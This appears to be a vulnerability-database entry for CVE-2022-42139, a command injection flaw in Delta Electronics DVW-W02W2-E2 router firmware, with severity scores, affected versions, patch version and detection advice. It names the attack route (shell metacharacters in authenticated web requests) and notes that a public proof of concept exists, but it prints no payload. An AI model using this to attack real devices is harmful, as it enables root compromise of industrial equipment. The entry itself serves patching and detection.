cbcvebase.
CVE-2022-42139
published 2022-12-14

CVE-2022-42139: Delta Electronics DVW-W02W2-E2 1.5.0.10 is vulnerable to Command Injection via Crafted URL.

PriorityP266high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EPSS
18.16%
96.8th percentile
Delta Electronics DVW-W02W2-E2 1.5.0.10 is vulnerable to Command Injection via Crafted URL.

Affected

1 ranges
VendorProductVersion rangeFixed in
deltawwdvw-w02w2-e2_firmware

Detection & IOCsextracted from sources · hover to see the quote

  • Vulnerability is exploitable via authenticated HTTP POST parameters on the DVW-W02W2-E2 web server — monitor for anomalous POST requests containing OS command injection payloads (e.g., shell metacharacters) to the device's web interface
  • NVD describes exploitation via a crafted URL — also monitor GET requests with shell metacharacters or command-injection sequences in URL parameters targeting the DVW-W02W2-E2 web interface
  • A public Proof of Concept exists (authored by T. Weber of CyberDanube Security Research) — prioritize detection and patching given active PoC availability
  • Successful exploitation grants root-level OS access — look for unexpected outbound connections, new privileged processes, or serial port command activity originating from the DVW-W02W2-E2 device
  • ·NVD attributes the vulnerability to firmware version 1.5.0.10, while the CISA ICS advisory attributes it to version 2.42 — ensure detection and patching scope covers both version references for the DVW-W02W2-E2
  • ·The vulnerability requires only low privileges (authenticated, PR:L) to exploit — do not assume that requiring authentication is a sufficient mitigation; any low-privileged account can be leveraged
  • ·The patched firmware version is 2.5.2 — devices running version 2.42 (or 1.5.0.10 per NVD) and below should be considered vulnerable and flagged in asset inventories
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.